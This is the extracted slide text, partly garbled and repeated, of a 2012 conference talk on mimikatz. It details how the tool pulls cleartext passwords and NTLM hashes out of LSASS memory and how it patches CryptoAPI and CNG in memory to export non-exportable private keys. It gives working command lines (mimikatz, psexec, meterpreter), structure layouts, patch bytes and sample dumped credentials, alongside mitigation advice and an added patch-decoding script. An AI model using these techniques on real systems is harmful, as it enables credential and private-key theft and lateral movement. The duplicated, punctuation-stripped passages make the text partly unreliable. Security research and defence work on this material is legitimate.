mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz :: crypto :: patchcapi / because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it.
I wrote "4" bytes in my memory space.
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi / demo time
Import, export, import as not exportable… export
mimikatz :: crypto :: patchcapi / limitations
Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng / how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with Common Criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
The process uses RPC to call "Key Isolation service" (keyiso) functions.
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz :: crypto :: cng / how it's exported ( level)
[Diagram: the process (CNG) asks to export a key; the request goes over RPC to the KeyIso service in the LSASS process (on NT6 a system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP), which does the DPAPI decode, loads the private key and checks Exportable? -> yes: Exported key / no: NTE_NOT_SUPPORTED (diagram label: "PLAYSKOOL")]
mimikatz :: crypto :: patchcng / because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to ncrypt!SPCryptExportKey in lsass (keyiso).
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz # crypto::exportKeys
[user] Clés CNG
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportabilité : NON
    Taille clé    : 2048
    Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
    mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng / because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
.text:6C815210 75 1C    jnz  short continue_key_export
.text:6C815210 EB 1C    jmp  short continue_key_export
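Decoding the patch bytes listed above for both the rsaenh.dll sites and this ncrypt.dll site, as an added example that is not part of the slides or of mimikatz: it computes the branch targets from the listed addresses and displacements, shows why a 6-byte jnz can be replaced in place by nop plus a 5-byte jmp carrying the same rel32, and counts the changed bytes. It is written from the integrity-check side: comparing mapped code against the on-disk DLL would surface exactly these conditional-to-unconditional rewrites; the decoder and helper names are this example's own.

```python
"""Added example (not mimikatz code): decode the branch patches shown on
the slides for rsaenh.dll (CryptoAPI) and ncrypt.dll (CNG), and show
what an in-memory integrity check would see.

The addresses and byte strings are the ones printed on the slides; the
decoder and the comparison helpers are written here for illustration."""
import struct

# (address, original bytes, patched bytes), copied from the slide listings.
# rsaenh!CPExportKey checks, patched by crypto::patchcapi in the caller's own process:
CAPI_SITES = [
    (0x0AC0B7CB, bytes.fromhex("0F8533C7FFFF"), bytes.fromhex("90E933C7FFFF")),
    (0x0AC1F749, bytes.fromhex("0F85B63BFFFF"), bytes.fromhex("90E9B63BFFFF")),
]
# ncrypt!SPCryptExportKey check inside lsass, patched by crypto::patchcng:
CNG_SITE = (0x6C815210, bytes.fromhex("751C"), bytes.fromhex("EB1C"))


def decode_branches(addr, code):
    """Decode the nop / jnz / jmp encodings used on the slides.

    Returns [(instruction address, mnemonic, absolute target or None)].
    x86 relative branches are computed from the address of the *next*
    instruction, so a 6-byte 'jnz rel32' and 'nop' + 5-byte 'jmp rel32'
    starting at the same address share the same displacement."""
    out, pos = [], 0
    while pos < len(code):
        at, op = addr + pos, code[pos]
        if op == 0x90:                                   # nop
            out.append((at, "nop", None)); pos += 1
        elif op == 0x0F and code[pos + 1] == 0x85:       # jnz rel32
            rel = struct.unpack_from("<i", code, pos + 2)[0]
            out.append((at, "jnz", at + 6 + rel)); pos += 6
        elif op == 0xE9:                                 # jmp rel32
            rel = struct.unpack_from("<i", code, pos + 1)[0]
            out.append((at, "jmp", at + 5 + rel)); pos += 5
        elif op == 0x75:                                 # jnz short rel8
            rel = struct.unpack_from("<b", code, pos + 1)[0]
            out.append((at, "jnz short", at + 2 + rel)); pos += 2
        elif op == 0xEB:                                 # jmp short rel8
            rel = struct.unpack_from("<b", code, pos + 1)[0]
            out.append((at, "jmp short", at + 2 + rel)); pos += 2
        else:
            raise ValueError(f"unhandled opcode {op:#04x} at {at:#010x}")
    return out


def branch_targets(addr, code):
    """Absolute targets of the branches in a snippet (nops ignored)."""
    return {t for _, _, t in decode_branches(addr, code) if t is not None}


def changed_bytes(original, patched):
    """How many bytes differ: the '4 bytes' and '1 byte' of the slides."""
    return sum(a != b for a, b in zip(original, patched))


def check_removed(addr, original, patched):
    """True when a conditional branch became an unconditional jump to the
    same target, i.e. the 'not exportable' path can no longer be taken.
    Comparing the mapped image against the on-disk DLL this way is what
    an integrity check of rsaenh.dll / ncrypt.dll would surface."""
    before = {m for _, m, _ in decode_branches(addr, original)}
    after = {m for _, m, _ in decode_branches(addr, patched)}
    return (bool(before & {"jnz", "jnz short"})
            and bool(after & {"jmp", "jmp short"})
            and branch_targets(addr, original) == branch_targets(addr, patched))


if __name__ == "__main__":
    for site in CAPI_SITES + [CNG_SITE]:
        addr, orig, new = site
        for at, mnem, target in decode_branches(addr, orig) + decode_branches(addr, new):
            tgt = "" if target is None else f"{target:#010x}"
            print(f"{at:#010x} {mnem:<10} {tgt}")
        print(f"  bytes changed: {changed_bytes(orig, new)}, check removed: {check_removed(*site)}")
```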
mimikatz :: crypto :: patchcng / demo time
Import, export, import as not exportable… export again
mimikatz :: crypto :: patchcng / limitations
Patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…
mimikatz :: crypto :: patchcng / bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo
Some commands:
mimikatz "crypto::patchcapi" "crypto::exportCertificates" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "crypto::patchcapi" "crypto::patchcng" "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz "privilege::debug" "crypto::patchcng" "crypto::patchcapi" "crypto::exportCertificates" "crypto::exportKeys" exit
Password:
– PFX files are protected by this password: mimikatz
Keys:
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts / computers
– no admin, no admin, no admin…
Basics:
– Use smartcards / tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth:
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver:
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz :: that's all folks
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: wdigest / workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> search the linked list wdigest!l_LogSessList for the LUID -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear]
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    […]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest / demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp / how?
Actually, I've only used a logical (empirical) approach to search for passwords…
– Protocol reading
– Symbols searching
~ Boring ~… be more brutal this time: make a WinDbg trap
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe

0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp / how?
Let's log in with a Live account on Windows 8.
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[…]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah, Pass the Hash capability with Live accounts too…
Live users can log on through RDP via SSO
mimikatz :: sekurlsa :: livessp / workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> search the linked list livessp!LiveGlobalLogonSessionList for the LUID -> KIWI_LIVESSP_LIST_ENTRY -> suppCreds -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos
Let's log in with a normal account.
After credentials protection, KerbCreateLogonSession calls:
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

Kerberos part for password
Kerberos ticket part? Maybe ;)
mimikatz :: sekurlsa :: kerberos (nt6) / workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) / workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> search the linked list kerberos!KerbLogonSessionList for the LUID -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear]
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa / demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos / "hu?"
Ok. It works…
But why?
Not at all logons on NT5 (can need an unlock)
From my understanding of Microsoft's explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical…
– For password auth:
  • password hash for the shared secret, but keeping the password in memory
– For full smartcard auth:
  • No password on client
  • No hash on client
– NTLM hash on client…
– KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, to be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them.
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process to take benefit of its keys when we called it.
Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" the LSASS-initialized keys
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we have the same behaviour as when we are in LSASS
mimikatz :: sekurlsa :: LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx
[Diagram: lsasrv globals in the lsass process: g_cbRandomKey (DWORD, 256), g_pRandomKey -> BYTE[g_cbRandomKey], g_pDESXKey -> BYTE[144], g_Feedback BYTE[8]; mimikatz loads its own lsasrv and copies these values from the lsass copy of lsasrv…]
mimikatz :: sekurlsa :: LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
[Diagram: lsasrv globals in the lsass process: InitializationVector BYTE[16], h3DesKey and hAesKey (each a KIWI_BCRYPT_KEY whose cle points to a KIWI_BCRYPT_KEY_DATA); mimikatz copies them from the lsass copy of lsasrv into its own…]
typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; // etc.
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo
Security Packages
Package           Symbols                                  Type
tspkg             tspkg!TSGlobalCredTable                  RTL_AVL_TABLE
wdigest           wdigest!l_LogSessList                    LIST_ENTRY
livessp           livessp!LiveGlobalLogonSessionList       LIST_ENTRY
kerberos (nt5)    kerberos!KerbLogonSessionList            LIST_ENTRY
kerberos (nt6)    kerberos!KerbGlobalLogonSessionTable     RTL_AVL_TABLE
msv1_0            lsasrv!LogonSessionList                  LIST_ENTRY
                  lsasrv!LogonSessionListCount             ULONG

Protection Keys
Key       NT 5 symbols
RC4       lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx      lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key       NT 6 symbols
(IV)      lsasrv!InitializationVector
3DES      lsasrv!h3DesKey
AES       lsasrv!hAesKey
mimikatz :: sekurlsa :: memo
Some commands:
mimikatz "privilege::debug" "sekurlsa::logonPasswords full" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
    msv1_0 :   * Utilisateur  : Gentil Kiwi
               * Domaine      : vm-w8-rp-x
               * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
               * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
    kerberos : * Utilisateur  : Gentil Kiwi
               * Domaine      : vm-w8-rp-x
               * Mot de passe : waza1234
    wdigest :  * Utilisateur  : Gentil Kiwi
               * Domaine      : vm-w8-rp-x
               * Mot de passe : waza1234
    tspkg :    * Utilisateur  : Gentil Kiwi
               * Domaine      : vm-w8-rp-x
               * Mot de passe : waza1234
    livessp :  n.t. (LUID KO)
mimikatz :: sekurlsa :: what we can do
Basics:
– No physical access to computers (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass the hash leaves traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks
More in depth:
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Take opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto :: what is it?
A little module that I wrote to:
– play with Windows Cryptographic API, CNG and RSA keys
– automate the export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format
    – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again?)
mod_mimikatz_crypto
mimikatz :: crypto :: how it's protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by:
– Password
– Popup
– Export/Archive flag not present
(Password and popup: a constraint for most users, unavailable for computer keys)
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi / how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
